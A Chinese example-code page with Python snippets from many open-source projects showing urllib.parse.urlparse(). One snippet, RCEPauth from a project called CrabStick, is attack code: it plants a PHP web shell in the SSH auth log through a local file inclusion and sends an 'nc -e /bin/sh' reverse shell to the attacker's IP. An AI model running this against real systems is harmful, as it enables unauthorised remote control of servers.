Python urllib.parse 模块,urlparse() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用urllib.parse.urlparse()

项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def ygdy8_list_page(url, is_index=False):
    """Crawl one ygdy8 listing page and queue the follow-up tasks.

    Every movie link returned by the parser is queued on
    ``ygdy8_movie_page``; every pagination entry except the first is queued
    back on this task.  Any exception is logged and swallowed.

    Args:
        url (string): absolute URL of the listing page
        is_index (bool): passed through to ``ygdy8.parse_list_page``
    """
    celery_logger.info('ygdy8_list_page url: {}'.format(url))

    try:
        parts = urlparse(url)
        raw = requests.get(url, headers={'Host': parts.netloc}).content
        # The body is decoded as GBK; undecodable bytes are dropped.
        html_page = raw.decode('gbk', 'ignore')

        movies, pages = ygdy8.parse_list_page(html_page, is_index)
        site_root = '{}://{}'.format(parts.scheme, parts.netloc)
        for movie_path in movies:
            ygdy8_movie_page.delay('{}{}'.format(site_root, movie_path))

        listing_dir = os.path.dirname(parts.path)
        for page_name in pages[1:]:
            next_url = '{}{}/{}'.format(site_root, listing_dir, page_name)
            ygdy8_list_page.delay(next_url, False)
    except Exception as exc:
        celery_logger.exception(exc)
项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def ygdy8_movie_page(url):
    """Fetch and parse one ygdy8 movie page, then queue the result for saving.

    The page is skipped when ``Entity.get`` already returns a record for the
    MD5-derived id of the URL.  Any exception is logged and swallowed.

    Args:
        url (string): movie page URL
            (eg: http://www.ygdy8.net/html/gndy/jddy/20170804/54635.html)
    """
    celery_logger.info('ygdy8_movie_page url: {}'.format(url))

    try:
        sid = calc_md5(url.encode('utf8'))
        if Entity.get(sid):
            return

        host = urlparse(url).netloc
        page_bytes = requests.get(url, headers={'Host': host}).content
        # The body is decoded as GBK; undecodable bytes are dropped.
        movie = ygdy8.YGDY8(page_bytes.decode('gbk', 'ignore'))
        movie.parse_html()

        save_ygdy8_data.delay(sid, url, movie.to_json())
    except Exception as exc:
        celery_logger.exception(exc)
项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def s80_movie_list(url):
    """Crawl one 80s listing page and queue the follow-up tasks.

    Each movie link is queued on ``s80_movie_page``; when the parser reports
    a next page, this task is queued again for it.  Any exception is logged
    and swallowed.

    Args:
        url (string): absolute URL of the listing page
    """
    celery_logger.info('s80_movie_list url: {}'.format(url))

    try:
        parts = urlparse(url)
        response = requests.get(url, headers={'Host': parts.netloc})
        movies, next_page = s80.parse_list_page(response.text)

        site_root = '{}://{}'.format(parts.scheme, parts.netloc)
        for movie_path in movies:
            s80_movie_page.delay('{}{}'.format(site_root, movie_path))

        if next_page:
            s80_movie_list.delay('{}{}'.format(site_root, next_page))
    except Exception as exc:
        celery_logger.exception(exc)
项目:pbtk    作者:marin-m    | 项目源码 | 文件源码
def prompt_extractor(self, item):
    """Collect input for the extractor behind *item* and start a worker.

    Depending on the extractor's ``pick_url`` flag the user is asked either
    for a URL or for one or more files.  Nothing happens when the
    extractor's dependencies are not installed or when no input was given.
    """
    extractor = extractors[item.data(Qt.UserRole)]
    if not assert_installed(self.view, **extractor.get('depends', {})):
        return

    inputs = []
    if extractor.get('pick_url', False):
        text, _accepted = QInputDialog.getText(self.view, ' ', 'Input an URL:')
        if text:
            url = urlparse(text)
            inputs.append((url.geturl(), url.netloc))
    else:
        files, _mime = QFileDialog.getOpenFileNames()
        inputs.extend((path, Path(path).stem) for path in files)

    if not inputs:
        return

    # A progress dialog with range 0..0 replaces the current view.
    wait = QProgressDialog('Extracting .proto structures...', None, 0, 0)
    wait.setWindowTitle(' ')
    self.set_view(wait)

    self.worker = Worker(inputs, extractor)
    self.worker.progress.connect(self.extraction_progress)
    self.worker.finished.connect(self.extraction_done)
    self.worker.start()
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def make_next_param(login_url, current_url):
    '''
    Strip the scheme and host from `current_url` when they are redundant
    with those of `login_url`, so the value passed along is shorter.

    The URL is returned unchanged when the login URL names a scheme or host
    that differs from the current one.  The fragment is always dropped from
    a reduced URL.

    :param login_url: The login URL being redirected to.
    :type login_url: str
    :param current_url: The URL to reduce.
    :type current_url: str
    '''
    login = urlparse(login_url)
    current = urlparse(current_url)

    scheme_differs = bool(login.scheme) and login.scheme != current.scheme
    host_differs = bool(login.netloc) and login.netloc != current.netloc
    if scheme_differs or host_differs:
        return current_url

    reduced = ('', '', current.path, current.params, current.query, '')
    return urlunparse(reduced)
项目:uzdevsbot    作者:Uzbek-Developers    | 项目源码 | 文件源码
def run_webhook(self, webhook_url, **options):
    """
    Convenience method for running bots in webhook mode

    The webhook is registered first.  If ``webhook_url`` is non-empty, a web
    application is then served on the URL's path.  The listen address comes
    from the ``HOST`` environment variable (default ``0.0.0.0``); the port
    comes from ``PORT`` and falls back to the port in the URL.

    :Example:

    >>> if __name__ == '__main__':
    >>>     bot.run_webhook(webhook_url="https://yourserver.com/webhooktoken")

    Additional documentation on https://core.telegram.org/bots/api#setwebhook
    """
    loop = asyncio.get_event_loop()
    loop.run_until_complete(self.set_webhook(webhook_url, **options))
    if not webhook_url:
        return

    url = urlparse(webhook_url)
    app = self.create_webhook_app(url.path, loop)
    host = os.environ.get('HOST', '0.0.0.0')
    env_port = int(os.environ.get('PORT', 0))
    # An unset or zero PORT falls back to the port given in the URL.
    port = env_port or url.port
    web.run_app(app, host=host, port=port)
项目:skymod    作者:DelusionalLogic    | 项目源码 | 文件源码
def fetch(self, uri, filename):
    """Download the file referenced by *uri* into *filename*.

    The netloc part of *uri* is used as the mod id for the download lookup.
    Logs in first when the parent class reports that a login is needed.

    Raises:
        RuntimeError: if the lookup request does not answer with HTTP 200.
    """
    if super().needs_login():
        super().perform_login(self.cfg, self.headers)

    mod_id = urlparse(uri).netloc
    session = super().getSession()

    lookup_url = "http://www.nexusmods.com/skyrim/Files/download/" + mod_id
    response = session.get(
        lookup_url,
        params={"game_id": "110"},
        allow_redirects=True,
        headers=self.headers
    )
    if response.status_code != 200:
        raise RuntimeError("Failed downloading " + uri)

    # The first entry of the JSON reply carries the actual download location.
    candidates = response.json()
    super().download_file(uri, candidates[0]["URI"], self.headers, filename)
项目:meg-server    作者:Argonne-National-Laboratory    | 项目源码 | 文件源码
def get_sendgrid_request_message(cfg, keyid, hex, user_email):
    """Build the mail that carries a key revocation link.

    The link is the configured server URL joined with
    ``<meg_url_prefix>/revoke`` and carries ``keyid`` and ``token`` query
    parameters.

    :param cfg: object whose ``config`` attribute holds the server and
        sendgrid settings
    :param keyid: key id placed in the link and in the mail body
    :param hex: token placed in the link
    :param user_email: recipient address
    :returns: the populated ``Mail`` object
    """
    revoke_path = os.path.join(cfg.config.meg_url_prefix, "revoke")
    url_prefix = urljoin(cfg.config.megserver_hostname_url, revoke_path)
    query = urlencode([("keyid", keyid), ("token", hex)])
    # Replace only the query component of the parsed URL.
    revocation_link = urlunparse(urlparse(url_prefix)._replace(query=query))

    message = Mail()
    message.add_to(user_email)
    message.set_from(cfg.config.sendgrid.from_email)
    message.set_subject(cfg.config.sendgrid.subject)
    message.set_html(EMAIL_HTML.format(keyid=keyid, link=revocation_link))
    return message
项目:post-review    作者:ericforbes    | 项目源码 | 文件源码
def determine_git_domain(origin_url):
    """Return the host part of a git remote URL, or None if there is none.

    Handles both SSH and HTTPS remotes.
    No support for relative URL path, only (sub)domain:
    https://docs.gitlab.com/omnibus/settings/configuration.html

    :param origin_url: remote URL, e.g. ``https://host/group/repo.git`` or
        ``git@host:group/repo.git``
    :returns: the netloc for scheme-based URLs, the text between ``@`` and
        the last ``:`` for SSH-style URLs, otherwise ``None``
    """
    # HTTPS URLS
    netloc = urlparse(origin_url).netloc
    if netloc:
        return netloc

    # SSH URLS
    match = re.search(r'@+(?P<ssh_git_url>.*)?:', origin_url)
    if match is None:
        # Explicit check instead of a bare ``except`` around ``.group()``,
        # which would also hide unrelated errors.
        return None
    return match.group('ssh_git_url') or None
项目:openstack-ansible-plugins    作者:openstack    | 项目源码 | 文件源码
def get_netloc(url):
    """Return the netloc from a URL.

    If the input value cannot be parsed as a URL the method will raise an
    Ansible filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        return urlparse(url).netloc
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netloc of: "%s"' % str(exp)
        )
项目:openstack-ansible-plugins    作者:openstack    | 项目源码 | 文件源码
def get_netorigin(url):
    """Return the origin (``scheme://netloc``) of a URL.

    If the input value cannot be parsed as a URL the method will raise an
    Ansible filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        parsed_url = urlparse(url)
        origin = (parsed_url.scheme, parsed_url.netloc)
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netorigin of: "%s"' % str(exp)
        )
    return '%s://%s' % origin
项目:poco    作者:shiwaforce    | 项目源码 | 文件源码
def check_remote(url):
    """Report whether the host named in *url* answers a single ping.

    The host is the netloc of *url* without any ``user:password@`` prefix or
    ``:port`` suffix.  The ping command is run without a shell and with the
    host as a separate argument, so characters in the URL can never be
    interpreted as shell syntax.

    :param url: URL whose host should be probed
    :returns: ``True`` when ping wrote nothing to stderr; ``False`` when it
        did, when the URL has no usable host, or when ping cannot be started
    """
    # TODO need a better solution
    netloc = urlparse.urlparse(url).netloc
    host = netloc.rpartition("@")[2].partition(":")[0]
    # No host means nothing to probe; a leading '-' would be read by ping
    # as an option rather than as a destination.
    if not host or host.startswith("-"):
        return False

    if platform.system().lower().startswith("win"):
        cmd = ["ping", "-n", "1", "-w", "1000", host]
    else:
        cmd = ["ping", "-c1", "-t1", host]

    try:
        p = Popen(cmd, stdout=PIPE, stderr=PIPE)
    except OSError:
        # ping is not installed or not executable: treat as unreachable.
        return False
    out, err = p.communicate()

    return len(err) == 0
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    """Load every configuration named in the ``use_config`` option.

    ``use_config`` is a comma-separated list of names.  When
    ``use_config_dir`` carries a URL scheme, the tools are additionally
    marked for download from that location.  Does nothing when
    ``use_config`` is ``None``.
    """
    opts = self.options
    requested = opts.use_config
    if requested is None:
        return

    url = urlparse(opts.use_config_dir)
    remote = {}
    if url.scheme:
        remote['download'] = True
        remote['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        remote['remote_locs'] = ['', DEFAULT_DIR]

    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for name in requested.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % name)
        self.load(name, tooldir=tooldir, **remote)

    self.start_msg('Checking for configuration')
    self.end_msg(requested)
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    """Load every configuration named in the ``use_config`` option.

    ``use_config`` is a comma-separated list of names.  When
    ``use_config_dir`` carries a URL scheme, the tools are additionally
    marked for download from that location.  Does nothing when
    ``use_config`` is ``None``.
    """
    opts = self.options
    requested = opts.use_config
    if requested is None:
        return

    url = urlparse(opts.use_config_dir)
    remote = {}
    if url.scheme:
        remote['download'] = True
        remote['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        remote['remote_locs'] = ['', DEFAULT_DIR]

    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for name in requested.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % name)
        self.load(name, tooldir=tooldir, **remote)

    self.start_msg('Checking for configuration')
    self.end_msg(requested)
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    """Load every configuration named in the ``use_config`` option.

    ``use_config`` is a comma-separated list of names.  When
    ``use_config_dir`` carries a URL scheme, the tools are additionally
    marked for download from that location.  Does nothing when
    ``use_config`` is ``None``.
    """
    opts = self.options
    requested = opts.use_config
    if requested is None:
        return

    url = urlparse(opts.use_config_dir)
    remote = {}
    if url.scheme:
        remote['download'] = True
        remote['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        remote['remote_locs'] = ['', DEFAULT_DIR]

    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for name in requested.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % name)
        self.load(name, tooldir=tooldir, **remote)

    self.start_msg('Checking for configuration')
    self.end_msg(requested)
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def _should_use_proxy(url, no_proxy=None):
    """Decide whether a proxy should be used to connect to ``url``.

    The host name of the URL is compared for exact equality against each
    comma-separated entry of ``no_proxy``; when ``no_proxy`` is None the
    ``no_proxy`` environment variable is used instead.

    @param url: URL
    @type url: basestring or urllib2.Request
    @return: False when the host is listed, True otherwise
    """
    if no_proxy is None:
        no_proxy_effective = os.environ.get('no_proxy', '')
    else:
        no_proxy_effective = no_proxy

    hostname = urlparse_.urlparse(_url_as_string(url)).hostname
    excluded_hosts = [entry.strip() for entry in no_proxy_effective.split(',')]
    return hostname not in excluded_hosts
项目:aio-service-client    作者:alfred82santa    | 项目源码 | 文件源码
async def generate_path(self, endpoint_desc, session, request_params):
    """Build the request URL for an endpoint and let plugins adjust it.

    The endpoint's ``path`` is appended to the path of ``self.base_path``
    with exactly one ``/`` between them.  The base URL's query string is
    kept; its fragment and path parameters are dropped.  Every plugin that
    defines ``prepare_path`` is then awaited in order and may replace the
    URL.

    Declared ``async`` because the body awaits the plugin hooks; ``await``
    inside a plain ``def`` is a syntax error.

    :param endpoint_desc: endpoint description; its ``path`` key is optional
    :param session: passed through to the plugin hooks
    :param request_params: passed through to the plugin hooks
    :returns: the final URL string
    :raises Exception: whatever a plugin hook raises, after logging it
    """
    endpoint_path = endpoint_desc.get('path', '')
    scheme, netloc, base, _params, query, _fragment = urlparse(self.base_path)
    joined = '/'.join([base.rstrip('/'), endpoint_path.lstrip('/')])
    # urlunsplit takes (scheme, netloc, path, query, fragment).  Passing the
    # urlparse 6-tuple minus its last item would shift the query into the
    # fragment slot, so the 5-tuple is built explicitly.
    path = urlunsplit((scheme, netloc, joined, query, ''))

    hooks = [getattr(plugin, 'prepare_path') for plugin in self._plugins
             if hasattr(plugin, 'prepare_path')]
    self.logger.debug("Calling {0} plugin hooks...".format('prepare_path'))
    for func in hooks:
        try:
            path = await func(endpoint_desc=endpoint_desc, session=session,
                              request_params=request_params, path=path)
        except Exception as ex:  # pragma: no cover
            self.logger.error("Exception executing {0}".format(repr(func)))
            self.logger.exception(ex)
            raise

    return path
项目:CrabStick    作者:Hack-Hut    | 项目源码 | 文件源码
def RCEPauth(temp):
    """Interactive routine that rewrites *temp* to target ``var/log/auth.log``.

    Reads the module-level ``url`` and ``headers`` and the globals ``ip`` and
    ``port``; the latter two are prompted for, and stored globally, when
    they are empty.

    :param temp: request URL containing ``etc/passwd``, which is replaced
        before the final request is sent
    """
    global port
    global ip
    outTime(2, "Just hit ctrl + c when asked for a password")
    # NOTE(review): ``url`` is not a parameter; it is read from module scope.
    parsed = urlparse(url)

    # Builds an ssh command line with the PHP snippet in the user-name
    # position and runs it through the shell.
    # NOTE(review): parsed.netloc is concatenated unquoted into a shell string.
    sysCMD = "ssh" + " '<pre><?php echo system($_GET['cmd']); exit; ?>'@" + parsed.netloc
    print(sysCMD)
    os.system(sysCMD)

    # Point the request at the auth log and open a ``cmd`` query parameter.
    temp = temp.replace('etc/passwd', 'var/log/auth.log&cmd=')
    if not ip:
        ip = input("Enter your IP address:                        : ")
    if not port:
        port = input("Enter local port for target to connect back to: ")
    outTime(3, "Remember to start a listener in another shell")
    input("Hit enter when listen is created")

    # URL-encoded command appended as the value of ``cmd``.
    cmd = "nc+-e+%2Fbin%2Fsh+" + ip + "+" + port
    try:
        r = openURL(temp + cmd, headers)
        outTime(2, "Shell closed")
        print(65*"-")
    except KeyboardInterrupt:
        # Ctrl+C while waiting on the request ends the program.
        sys.exit()
项目:marblecutter    作者:mojodna    | 项目源码 | 文件源码
def __init__(self,
             table="footprints",
             database_url=os.getenv("DATABASE_URL"),
             geometry_column="geom"):
    """Open a connection pool for the database named by *database_url*.

    :param table: stored on the instance as ``table``
    :param database_url: connection URL; the default is the value of the
        ``DATABASE_URL`` environment variable at definition time
    :param geometry_column: stored on the instance as ``geometry_column``
    :raises Exception: if no database URL is available
    """
    if database_url is None:
        raise Exception("Database URL must be provided.")

    # ``uses_netloc`` is a process-wide list; register each scheme only
    # once so repeated instantiation does not keep growing it.
    for scheme in ('postgis', 'postgres'):
        if scheme not in urlparse.uses_netloc:
            urlparse.uses_netloc.append(scheme)
    url = urlparse.urlparse(database_url)

    self._pool = ThreadedConnectionPool(
        1,
        16,
        database=url.path[1:],  # drop the leading '/'
        user=url.username,
        password=url.password,
        host=url.hostname,
        port=url.port)

    self._log = logging.getLogger(__name__)
    self.table = table
    self.geometry_column = geometry_column
项目:hdx-data-freshness    作者:OCHA-DAP    | 项目源码 | 文件源码
def check_urls(self, resources_to_check, results=None, hash_results=None):
    """Retrieve resources and re-retrieve those whose hash has changed.

    When *results* is None the resources are spread out by domain and
    retrieved.  Every result that carries a hash is compared with the
    ``md5_hash`` stored for that resource in the current run; mismatches
    are collected.  When *hash_results* is None the mismatches are
    retrieved as well.

    :returns: tuple ``(results, hash_results)``
    """
    def get_domain(x):
        return urlparse(x[0]).netloc

    if results is None:  # pragma: no cover
        resources_to_check = list_distribute_contents(resources_to_check, get_domain)
        results = retrieve(resources_to_check)
        if self.testsession:
            serialize_results(self.testsession, results)

    hash_check = []
    for resource_id, outcome in results.items():
        url, err, http_last_modified, md5, force_hash = outcome
        if not md5:
            continue
        dbresource = self.session.query(DBResource).filter_by(
            id=resource_id, run_number=self.run_number).one()
        if dbresource.md5_hash != md5:  # File changed
            hash_check.append((url, resource_id, force_hash))

    if hash_results is None:  # pragma: no cover
        hash_check = list_distribute_contents(hash_check, get_domain)
        hash_results = retrieve(hash_check)
        if self.testsession:
            serialize_hashresults(self.testsession, hash_results)

    return results, hash_results
项目:sketal    作者:vk-brain    | 项目源码 | 文件源码
def get_url_query(self, url):
    """Return the parameters carried by *url* as a dict.

    The fragment is parsed when there is one, otherwise the query string.
    When ``get_token_from_url`` finds a token it is stored under
    ``access_token``.
    """
    if not isinstance(url, str):
        url = str(url)

    parsed_url = urlparse(url)
    raw_pairs = parsed_url.fragment or parsed_url.query

    # login_response_url_query can have multiple key
    url_query = dict(parse_qsl(raw_pairs))

    token = self.get_token_from_url(url)
    if token:
        url_query["access_token"] = token

    return url_query

    ############################################################################
项目:aqbot    作者:aqisnotliquid    | 项目源码 | 文件源码
def mdn_cmd(self, listener, sender, target, args):
    """Reply to *target* with the first MDN search hit for *args*.

    With no search terms the MDN home page link is sent instead.
    """
    if not args.split():
        self.messenger.msg(target, "https://developer.mozilla.org/ - Mozilla Developer Network")
        return

    pool = urllib3.PoolManager()
    search_prefix = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q="
    site_filter = "%20site%3Adeveloper.mozilla.org"
    # NOTE(review): args is inserted into the URL without percent-encoding.
    request_url = urlparse(search_prefix + args + site_filter).geturl()
    reply = pool.request("GET", request_url)
    payload = json.loads(reply.data.decode('UTF-8'))
    self.messenger.msg(target, payload['responseData']['results'][0]['url'])
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def sendResponse(reportID: str, actionName: str, respURL: str) -> None:
    """ Post the requested report text back to Slack as an ephemeral message.

    The report data is only sent when the host of ``respURL`` is
    ``slack.com`` or one of its subdomains.  For any other host a short
    failure notice is posted instead and ``URLError`` is raised.

    :param reportID: report whose body or metadata is requested
    :param actionName: ``'body'`` or ``'metadata'``
    :param respURL: response URL to post to
    :raises ValueError: if ``actionName`` is not a known button
    :raises URLError: if ``respURL`` is not on the slack.com domain
    """
    if actionName == 'body':
        text = getBody(reportID)
    elif actionName == 'metadata':
        text = getMetadata(reportID)
    else:
        raise ValueError("Button %s not defined!" % actionName)
    ephemeralJson = {'response_type': 'ephemeral',
                     'replace_original': False,
                     'text': text}
    # Even if an attacker gets the verification token, we will still refuse to post the data to non-slack.com URLs
    # A URL without a host yields None; treat it as "not Slack" instead of crashing.
    hostname = urlparse(respURL).hostname or ''
    # A bare suffix test would also accept hosts such as "evilslack.com",
    # so require the exact domain or a real subdomain of it.
    if hostname == 'slack.com' or hostname.endswith('.slack.com'):
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
    else:
        ephemeralJson['text'] = (('Failed URL check, respURL=%s which is not on the slack.com domain name! This check '
                                  'is theoretically not required (since we verify the verification token), but done as '
                                  'an extra defensive step. To disable this, edit slackServer.py in the project root.')
                                 % respURL)
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
        raise URLError("respURL=%s not on slack.com domain!" % respURL)
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def parseURL(url: str) -> URLParts:
    """ Parse the given URL into a URLParts named tuple and normalize any relevant domain names

    The first pattern in ``config.hostnameSanitizers`` that matches the
    start of the host name replaces it with the mapped value.  Returns
    None when a ValueError is raised while parsing.
    """
    try:
        parsed = urlparse(url)
        hostname = parsed.hostname or ''

        domain = hostname
        if config.hostnameSanitizers:
            for regex, result in config.hostnameSanitizers.items():
                if re.match(regex, hostname):
                    domain = result
                    break

        queries = dict(parse_qsl(parsed.query))
        return URLParts(domain=domain, path=parsed.path, queries=queries)
    except ValueError:
        return None
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def isProgramURL(url: str, acceptAll=True) -> bool:
    """ Whether the given url is a program URL

    With no ``config.domains`` configured every URL is accepted.  Otherwise
    the URL's host must equal one of the configured domains or be a
    subdomain of one, and must not resolve to 127.0.0.1.

    :param url: URL to classify
    :param acceptAll: kept for interface compatibility; it does not
        influence the result (it was only read in an unreachable branch)
    """
    # Use the parsed host name rather than netloc.split(':')[0]: for
    # "http://good.com:x@evil.com/" the latter yields "good.com" although
    # the request would go to evil.com.
    domain = (urlparse(url).hostname or '').lower()
    if not config.domains:
        return True
    if not domain or not isinstance(config.domains, list):
        return False

    try:
        ip = socket.gethostbyname(domain)
    except (socket.gaierror, UnicodeError):
        ip = None
    if ip == '127.0.0.1':
        return False

    for hostname in config.domains:
        suffix = hostname.lower().lstrip('.')
        # Match on a label boundary so "evilexample.com" does not pass for
        # a configured "example.com".
        if suffix and (domain == suffix or domain.endswith('.' + suffix)):
            return True
    return False
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def getVulnDomains(self) -> List[str]:
    """  Get a list of the vulnerable domains (used for duplicate detection-not an accurate process)

    The ``vulnDomain`` recorded in the metadata of a bot comment wins when
    one can be extracted; otherwise the hosts of every link found in the
    reporter's comments and the report body are returned.
    """
    def hostsOf(urls: List[str]) -> List[str]:
        return [urlparse(link).hostname for link in urls]

    botComments = self._getAllCommentsByUsername(config.apiName)
    reporterBodies = [self.__getBody(comment)
                      for comment in self._getAllCommentsByUsername(self.getReporterUsername())]
    reporterComments = reporterBodies + getLinks(self.getReportBody())

    # First attempt at getting a list of vulnerable domains, see if it is ever set in the metadata
    for botComment in botComments:
        body = self.__getBody(botComment)
        try:
            metadataSection = body.split('Metadata')[-1]
            return hostsOf([extractJson(metadataSection)['vulnDomain']])
        except (KeyError, TypeError):
            continue

    # If not, just return the list of all the urls
    allURLs = []
    for comment in reporterComments:
        for link in getLinks(comment):
            allURLs.append(link)
    return hostsOf(allURLs)
项目:AlexaPi    作者:alexa-pi    | 项目源码 | 文件源码
def parse_stream_url(self, url):
    """Resolve *url* into a list of stream URLs without duplicates.

    URLs whose path ends in ``.mp3`` or ``.wma`` are returned as-is.
    Otherwise the target is fetched as a playlist and parsed; when nothing
    was fetched but a content type is known, the URL itself is returned.
    """
    logger.debug('Extracting URIs from %s', url)
    extension = urlparse(url).path[-4:]
    if extension in ('.mp3', '.wma'):
        logger.debug('Got %s', url)
        return [url]  # Catch these easy ones

    results = []
    playlist, content_type = self._get_playlist(url)
    if playlist:
        parser = find_playlist_parser(extension, content_type)
        if parser:
            playlist_data = StringIO.StringIO(playlist)
            try:
                # Drop empty entries and entries pointing back at the playlist.
                results = [entry for entry in parser(playlist_data)
                           if entry and entry != url]
            except Exception as exp:   # pylint: disable=broad-except
                logger.error('TuneIn playlist parsing failed %s', exp)
            if not results:
                logger.debug('Parsing failure, '
                             'malformed playlist: %s', playlist)
    elif content_type:
        results = [url]

    logger.debug('Got %s', results)
    # OrderedDict keys remove duplicates while keeping first-seen order.
    return list(OrderedDict.fromkeys(results))
项目:aioviber    作者:nonamenix    | 项目源码 | 文件源码
def get_app(self, static_serve=False) -> web.Application:
    """
    Create aiohttp application for webhook handling

    The webhook handler is registered for POST requests on the path of
    ``self.webhook``.  Depending on the instance flags, webhook
    registration is hooked into application startup and removal into
    cleanup.
    """
    app = get_app(self, static_serve=static_serve)

    # webhook handler
    app.router.add_post(urlparse(self.webhook).path, self.webhook_handle)

    # viber webhooks registering
    if self._unset_webhook_on_cleanup:
        def unset_webhook(application):
            return application.bot.api.unset_webhook()
        app.on_cleanup.append(unset_webhook)

    if self._set_webhook_on_startup:
        def set_webhook(application):
            return application.bot.set_webhook_on_startup()
        app.on_startup.append(set_webhook)

    return app
项目:Sci-Finder    作者:snverse    | 项目源码 | 文件源码
def check_headers(self, headers):
    """Emit HTTP warnings for questionable ``etag`` and ``location`` headers.

    Warns about a lowercase weak indicator (``w/``), an etag that is not
    wrapped in double quotes, and a location without a network location.
    """
    etag = headers.get('etag')
    if etag is not None:
        if etag.startswith(('W/', 'w/')):
            if etag.startswith('w/'):
                warn(HTTPWarning('weak etag indicator should be upcase.'),
                     stacklevel=4)
            etag = etag[2:]
        is_quoted = etag[:1] == '"' and etag[-1:] == '"'
        if not is_quoted:
            warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4)

    location = headers.get('location')
    if location is not None and not urlparse(location).netloc:
        warn(HTTPWarning('absolute URLs required for location header'),
             stacklevel=4)
项目:Sci-Finder    作者:snverse    | 项目源码 | 文件源码
def check_headers(self, headers):
    """Emit HTTP warnings for questionable ``etag`` and ``location`` headers.

    Warns about a lowercase weak indicator (``w/``), an etag that is not
    wrapped in double quotes, and a location without a network location.
    """
    etag = headers.get('etag')
    if etag is not None:
        if etag.startswith(('W/', 'w/')):
            if etag.startswith('w/'):
                warn(HTTPWarning('weak etag indicator should be upcase.'),
                     stacklevel=4)
            etag = etag[2:]
        is_quoted = etag[:1] == '"' and etag[-1:] == '"'
        if not is_quoted:
            warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4)

    location = headers.get('location')
    if location is not None and not urlparse(location).netloc:
        warn(HTTPWarning('absolute URLs required for location header'),
             stacklevel=4)
项目:docker-grader    作者:elsys    | 项目源码 | 文件源码
def test_valid_file_upload(admin_client):
    """Uploading a zip redirects back to the task and stores the bytes."""
    task = Task.objects.create(slug='test')
    payload = b"a"

    url = reverse('task', kwargs={'task_id': task.id})
    upload = SimpleUploadedFile(
        "task1.zip", payload, content_type="application/zip")

    response = admin_client.post(url, {'zip_file': upload})
    assert response.status_code == 302
    assert urlparse(response.url).path == url

    submissions = TaskSubmission.objects.all()
    assert len(submissions) == 1

    # The stored submission must hold exactly the uploaded bytes.
    with open(submissions[0].get_submission_path(), 'rb') as stored:
        assert payload == stored.read()
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def query_params(self, value=None):
    """
    Return or set a dictionary of query params

    Called without a value, the current query string is parsed (blank
    values are kept) into a dict of lists.  Called with a value, the result
    of ``URL._mutate`` with the newly encoded query is returned.

    :param dict value: new dictionary of values
    """
    if value is not None:
        return URL._mutate(self, query=unicode_urlencode(value, doseq=True))

    query = self._tuple.query
    if query is None:
        query = ''

    if six.PY3:
        return parse_qs(query, True)

    # In Python 2.6, urlparse needs a bytestring so we encode and then
    # decode the result.
    return dict_to_unicode(parse_qs(to_utf8(query), True))
项目:eea.corpus    作者:eea    | 项目源码 | 文件源码
def dashboard(global_config, **settings):
    """ WSGI entry point for the Flask app RQ Dashboard

    Redis connection settings are derived from the ``REDIS_URL``
    environment variable (default ``redis://localhost:6379/0``).

    :returns: the WSGI callable of the configured Flask app
    """

    redis_uri = os.environ.get('REDIS_URL', 'redis://localhost:6379/0')
    p = parse.urlparse(redis_uri)
    # Splitting netloc on ':' breaks for URLs without a port and for URLs
    # with credentials ("redis://:secret@host:6379/0"); the parsed
    # attributes handle both.  The port stays a string, as before.
    host = p.hostname or 'localhost'
    port = str(p.port or 6379)
    db = p.path[1:] if len(p.path) > 1 else '0'

    redis_settings = {
        'REDIS_URL': redis_uri,
        'REDIS_DB': db,
        'REDIS_HOST': host,
        'REDIS_PORT': port,
    }

    app = Flask(__name__,
                static_url_path="/static",
                static_folder=resource_filename("rq_dashboard", "static")
                )
    app.config.from_object(rq_dashboard.default_settings)
    app.config.update(redis_settings)
    app.register_blueprint(rq_dashboard.blueprint)
    return app.wsgi_app
项目:PythonStudyCode    作者:TongTongX    | 项目源码 | 文件源码
def test_auth_url(self):
    """``facebook.auth_url`` builds the expected OAuth dialog URL."""
    perms = ['email', 'birthday']
    redirect_url = 'https://localhost/facebook/callback/'

    expected_params = dict(client_id=self.app_id,
                           redirect_uri=redirect_url,
                           scope=','.join(perms))
    expected_url = ('https://www.facebook.com/dialog/oauth?' +
                    urlencode(expected_params))
    actual_url = facebook.auth_url(self.app_id, redirect_url, perms=perms)

    # Since the order of the query string parameters might be
    # different in each URL, we cannot just compare them to each
    # other.
    expected = urlparse(expected_url)
    actual = urlparse(actual_url)
    expected_query = parse_qs(expected.query)
    actual_query = parse_qs(actual.query)

    for component in ('scheme', 'netloc', 'path', 'params'):
        self.assertEqual(getattr(actual, component),
                         getattr(expected, component))
    self.assertEqual(actual_query, expected_query)
